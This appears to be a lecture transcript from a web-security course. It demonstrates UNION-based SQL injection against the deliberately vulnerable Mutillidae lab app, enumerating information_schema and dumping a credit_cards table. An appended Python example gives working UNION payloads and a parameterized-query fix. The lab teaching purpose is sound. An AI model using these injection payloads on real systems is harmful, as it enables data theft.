In this course, we're going to continue learning about SQL Injections, focusing on GET SQL Injections. They are very similar to POST SQL Injections but we're going to learn about new techniques, new kinds of attacks, and much more.
Hi, in this lecture we're going to take one step further and try to get the column names through this UNION SELECT query, so that we can find the information inside the tables that we haven't seen yet. So far we have gathered the database user and version information, which is very good. But we also need the column names in order to see the data inside those columns as well. So, if there is a vulnerability over here, then we can find it. In order to do that you have to know something, and that something is called the information schema. There is an information schema structure in MySQL databases. When you create a database, you will see an information schema structure that contains every kind of thing that is going on inside that database. For example, if you have a WordPress blog, or a WordPress website in general, you can open your phpMyAdmin, and if you go to the MySQL section of phpMyAdmin, you will see that you have this information schema. And of course we have this information schema in this case as well.
So, we need to understand how to reach that information schema and how to use it in order to retrieve some further information. We're going to do that using the same thing we have been using so far, the UNION SELECT. We're not going to learn anything new in this case, but this time we're going to select something from the information schema rather than from a regular table. So, we're going to try and see what kind of information we can gather from this information schema and use it in our queries. I'm going to copy this, and rather than saying 1, 2, 3, 4, 5, first of all we have to say FROM information_schema, because that's what we're going to query from. But you also have to say .tables at the end, because there is a tables section and there is a columns section inside of the information schema. First of all, we need to get the table names, so we can choose which table we actually want to read the values from. So far we haven't been writing SELECT this FROM that; we have just been doing UNION SELECT.
This time, we're going to select table_name from information_schema.tables. I'm putting table_name in the second column over here, because the second, third and fourth columns are the ones whose contents get displayed on the page. So, I'm going to paste this over here, give some random thing as the password, and if I view the account details, then I will see all the table names in the second column. By the way, there might be some cases where you should put null in here, meaning nil or no information. In this case it still works: as you can see, in the second column we have the table names. So, we have character sets, collations, columns, key_column_usage, profiling, routines, something like tables, user privileges. I don't know, we have a lot of tables over here, like users, func. Let's see what else we have: user, accounts, galaxia something like that, and actually we see the others: tiki_blog, tiki_blogs, tiki_calendar. So, this is not even our website. This is not even Mutillidae, this is TWiki, but since the user is root, we see it too. Let me go to 10.0.2.5. As you can see, there is TWiki, DVWA and phpMyAdmin over here. We haven't been working with this TWiki, for example, but since the user is root, it has access to all of these tables inside of MySQL in general.
But we are not interested in any other websites; we are interested in Mutillidae, and we already know the database name in here as well. So, we can filter this result and see only the table names inside the Metasploitable Mutillidae database. In real life maybe you don't have to do this, maybe you actually want to see every kind of detail that you're going to get, but it will make our job very easy if we say WHERE table_schema = owasp10, like that. We know that our current database is owasp10 because we have seen it with the database() special function. So, I'm going to just put it over here. If I view the account details, then I'm going to get the results, but in a filtered way. As you can see, we have accounts, blogs_tables, credit_cards, hitlog and pen_test_tools. We had these results before, but now we can see only them. In real life we would see only those anyway, because nobody would run the web application as the root database user, but in this case the filtering paid off. So, I'm going to focus on the credit_cards table over here. Let's see how it's done. I'm going to get the things from the credit_cards table right now, rather than from the information schema. I'm going to change this to information_schema.columns rather than information_schema.tables, and over here I'm just going to say column_name. And I'm going to change the WHERE clause as well: rather than saying table_schema, I'm going to say table_name = credit_cards, so it will filter the results to show us only the column names inside of the credit_cards table. So, if I just do this, I can see that we have ccid (I believe it's the credit card ID or identification), ccnumber, ccv, and expiration date over here. That's good. Now I know the column names and I know the table name as well, so I can just do what I have to do and retrieve this information.
I have all the things that I need. So I'm going to copy this one more time and paste it below. I'm going to change this UNION SELECT a little bit: rather than column_name, we can have ccid or ccnumber, whatever you want; actually you know all the column names right now. So, let's go for ccnumber, and in the third column let's go for ccv. And for the fourth column, let's go for exploration or expiration, however you may want to pronounce it. So, expiration date, and that's it. Over here we have the UNION SELECT and everything. Let me try to copy this and paste it, and just give a random password over here; it won't matter. And we have an error. Let's see what that error is. It says that ccnumber is not in the field list. But let's go back. It's ccnumber; I believe I didn't misspell it.
Let's try one more time and see the error over here. No, it's just complaining about ccnumber. So, there is something wrong with our query in here: we have been selecting this from information_schema.columns where table_name is credit_cards, which doesn't make sense, because we don't have to do that anymore. We just have to get it from credit_cards, right? Why are we doing all of this stuff? So, all you have to do is just get rid of these things. We are not interested in information_schema.columns anymore, or in the table_name filter over here either. We are only interested in getting this column data, the column records, from credit_cards itself. So, I'm going to delete everything from here and just say expiration FROM credit_cards. Yep, that's the way to go. Let me just try and see if I made this right. I believe so. Let me copy this, go back and put it in the name section. For the password I'm just going to give 1, and here we go, another error. What does it say? It says the statements have a different number of columns. Let's see if we deleted a column over here. It seems so: we have deleted column five by mistake. Maybe you have seen it; as you can see, we have four right now.
I'm just going to edit it, and finally I believe that's going to work. I'm going to copy this and paste it over here, give some password, and here you go: we managed to get the credit card numbers. This is a credit card number, the CCV, the expiration date, and so on. So, this is how you dig deeper. Of course, it changes case by case; maybe it wouldn't be so easy, maybe you would have to guess some column names or something like that. But in this case we have seen what to do when we have access to all of this stuff. So now you know how to work with all of this. That's cool, but that's not enough for SQL injection, because again, this is one of the most popular things that you may come across on the web. We have to dig deeper. We have to see what to do when security is hardened: how to bypass firewalls, or how to bypass filtering on the server as well. We're going to have a section on that, starting with the next lecture.
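As an added example (not from the lecture), here is a small Python stand-in for the vulnerable account lookup the lecture exploits, showing the column-count error from the last step and the parameterized fix beside the vulnerable query. It uses an in-memory SQLite database with constructed accounts and credit_cards tables (column names from the lecture, row values made up), so there is no information_schema here; it covers only the final data-retrieval step and its remediation.

```python
import sqlite3

# Constructed stand-in for the owasp10 database: an accounts table with five
# columns (matching the "1, 2, 3, 4, 5" UNION SELECT in the lecture) and the
# credit_cards table with the column names the lecture enumerated. Values are made up.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts(cid INTEGER, username TEXT, password TEXT,
                              signature TEXT, is_admin TEXT);
        CREATE TABLE credit_cards(ccid INTEGER, ccnumber TEXT, ccv TEXT, expiration TEXT);
        INSERT INTO accounts VALUES (1, 'admin', 'adminpass', 'g0t r00t?', 'TRUE');
        INSERT INTO credit_cards VALUES (1, '4111111111111111', '745', '2012-03-01');
    """)
    return db

def lookup_vulnerable(db, username, password):
    # Builds the query by string concatenation, as the vulnerable page does,
    # so a quote in 'username' ends the string literal and the rest becomes SQL.
    sql = (f"SELECT * FROM accounts WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchall()

def lookup_safe(db, username, password):
    # Parameterized query: the driver passes user input as data, never as SQL.
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

def try_payload(db, payload):
    """Run the vulnerable lookup with a UNION payload in the username field.
    Returns the rows, or the database error text (the mismatch the lecture hit)."""
    try:
        return lookup_vulnerable(db, payload, "x")
    except sqlite3.OperationalError as err:
        return str(err)

# Four columns on the right of UNION against five on the left: rejected by the database.
FOUR_COLUMN = "' UNION SELECT ccid, ccnumber, ccv, expiration FROM credit_cards -- "
# Five columns: the credit_cards row comes back through the accounts query.
FIVE_COLUMN = "' UNION SELECT 1, ccnumber, ccv, expiration, 5 FROM credit_cards -- "

if __name__ == "__main__":
    db = build_db()
    print("4 columns:", try_payload(db, FOUR_COLUMN))
    print("5 columns:", try_payload(db, FIVE_COLUMN))
    print("parameterized:", lookup_safe(db, FIVE_COLUMN, "x"))
```

The same five-column payload that dumps the card row through lookup_vulnerable returns nothing from lookup_safe, because the placeholder binds the whole string as a username value.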
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.